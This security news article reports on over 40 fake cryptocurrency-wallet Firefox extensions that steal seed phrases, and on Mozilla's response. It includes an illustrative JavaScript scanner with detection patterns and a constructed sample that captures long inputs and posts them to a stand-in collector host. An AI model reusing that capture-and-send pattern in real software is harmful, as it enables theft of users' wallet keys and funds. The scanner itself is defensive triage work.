Over 40 Firefox Extensions Caught Stealing Cryptocurrency

Security researchers have uncovered more than 40 malicious browser extensions on the official Firefox Add-ons Store, all disguised as legitimate cryptocurrency wallets. These fraudulent extensions were designed to steal users’ private keys, seed phrases, and sensitive wallet data, exposing victims to full asset compromise.

Key Findings
Fake Wallet Extensions
The rogue add-ons impersonated well-known crypto wallets, including:
- MetaMask
- Coinbase Wallet
- Trust Wallet
- Phantom
- Exodus
- OKX
- Keplr
- MyMonero
These extensions appeared polished, often copied directly from open-source versions of real wallets, but were injected with malicious code.

Campaign Timeline
- Active Since: April 2025
- Status: Ongoing
- New uploads were detected as recently as last week, indicating that the operation is still active and evolving.
How the Attack Works
The malicious extensions were engineered to mimic real wallets in functionality and appearance while secretly harvesting sensitive data.
- Cloned source code: Legitimate open-source wallet projects were used as the base.
- Injected malware: Hidden event listeners (e.g., input or click) monitored user activity, looking for seed phrases or private keys (typically input strings over 30 characters).
- Silent data theft: Captured data was silently exfiltrated to attacker-controlled servers.
- Error dialogs were hidden using CSS (opacity: 0) to avoid alerting users to failed actions or back-end errors.
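
For defenders who want to triage an unpacked extension for the behaviours listed above, the following is an added example, not code from Koi Security, Mozilla, or any of the extensions. The rule set, the function name scanExtension, the sample file names, and the collector.example host are assumptions made for illustration.

```javascript
// Added example: static triage of unpacked extension sources. The rule set and
// the >= 30 threshold are assumptions drawn from the behaviours listed above.
const RULES = [
  { id: "listener", re: /addEventListener\(\s*["'`](?:input|click)["'`]/ },
  { id: "long-input-check", re: /\.length\s*>=?\s*(\d+)/, accept: (m) => Number(m[1]) >= 30 },
  { id: "network-send", re: /\b(?:fetch|sendBeacon)\s*\(|new\s+(?:XMLHttpRequest|WebSocket)\b/ },
  { id: "hidden-ui", re: /opacity\s*:\s*0(?![.\d])/ },
];

// files: { "relative/path": "file contents" } -> { verdict, findings }
function scanExtension(files) {
  const findings = [];
  for (const [file, text] of Object.entries(files)) {
    text.split(/\r?\n/).forEach((src, i) => {
      for (const rule of RULES) {
        const m = rule.re.exec(src);
        if (m && (!rule.accept || rule.accept(m))) findings.push({ file, line: i + 1, rule: rule.id });
      }
    });
  }
  const rulesIn = (file) => new Set(findings.filter((f) => f.file === file).map((f) => f.rule));
  // A listener plus a long-input length check in one file matches the capture step.
  const captures = Object.keys(files).some((f) => {
    const r = rulesIn(f);
    return r.has("listener") && r.has("long-input-check");
  });
  const sends = findings.some((f) => f.rule === "network-send");
  // Capture plus any outbound call is "suspicious"; any other hit needs a human look.
  const verdict = captures && sends ? "suspicious" : findings.length ? "review" : "clean";
  return { verdict, findings };
}

// Constructed samples (not taken from any real extension).
const SAMPLE_FLAGGED = {
  "content/ui.js": [
    'document.addEventListener("input", (e) => {',
    "  const v = e.target.value;",
    "  if (v.length > 30) queue(v);",
    "});",
  ].join("\n"),
  "background/sync.js": 'fetch("https://collector.example/u", { method: "POST", body: pending });',
  "popup/style.css": ".error-dialog { opacity: 0; }",
};
const SAMPLE_BENIGN = {
  "popup/form.js": "if (name.length > 5) save(name);",
  "popup/style.css": ".fade { opacity: 0.5; }",
};
console.log(scanExtension(SAMPLE_FLAGGED));
```

Hits are leads for manual review, not proof: genuine wallets also listen for input and make network calls, and minified or obfuscated code will not match these line-based patterns reliably.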
Fake Reviews & Ratings
Many of the extensions had hundreds of five-star reviews, grossly inconsistent with their actual installation numbers. In contrast, 1-star reviews often warned of scams—likely posted by victims after losing funds.
Mozilla’s Response
The issue was initially flagged by Koi Security, but many of the malicious extensions remained online at the time of public disclosure.
Mozilla’s Actions:
- Claimed that dozens of extensions had been removed prior to the report
- Acknowledged that additional extensions remain under review
- Introduced a new fraud detection system to:
  - Generate risk profiles for crypto-related add-ons
  - Flag suspicious extensions for manual review before approval
Official Statement:
"We’re aware of attempts to abuse Firefox’s extension ecosystem to distribute cryptocurrency-stealing malware. We’ve improved our processes and tools to detect and remove such add-ons faster. Many extensions mentioned in Koi Security’s report were already taken down prior to publication, alongside dozens of others. We’re reviewing the remaining ones and continue working to protect Firefox users."
What Users Should Do
Immediate Actions:
- Uninstall any suspicious wallet extensions, especially if they resemble the brands listed above.
- Review extension ratings critically—a disproportionate number of 5-star reviews with low install counts is a red flag.
- Avoid third-party downloads—only install wallet extensions directly from official project websites.
- Audit wallet activity—if you’ve used a suspicious extension, move your funds to a new wallet with fresh seed phrases.
Why This Matters
Browser extensions are powerful—they operate with deep access to webpage content, including login fields, crypto interfaces, and secure APIs. This makes them a prime vector for digital theft, especially in self-custody environments where recovery options are limited.
Firefox’s open extension model encourages innovation but requires more robust vetting to protect users in high-risk categories like crypto.
Final Warning
Even in trusted browser ecosystems, malicious extensions can slip through. Always:
- Verify the publisher
- Avoid installing from search results
- Cross-reference with official documentation
In crypto, one wrong click can cost everything.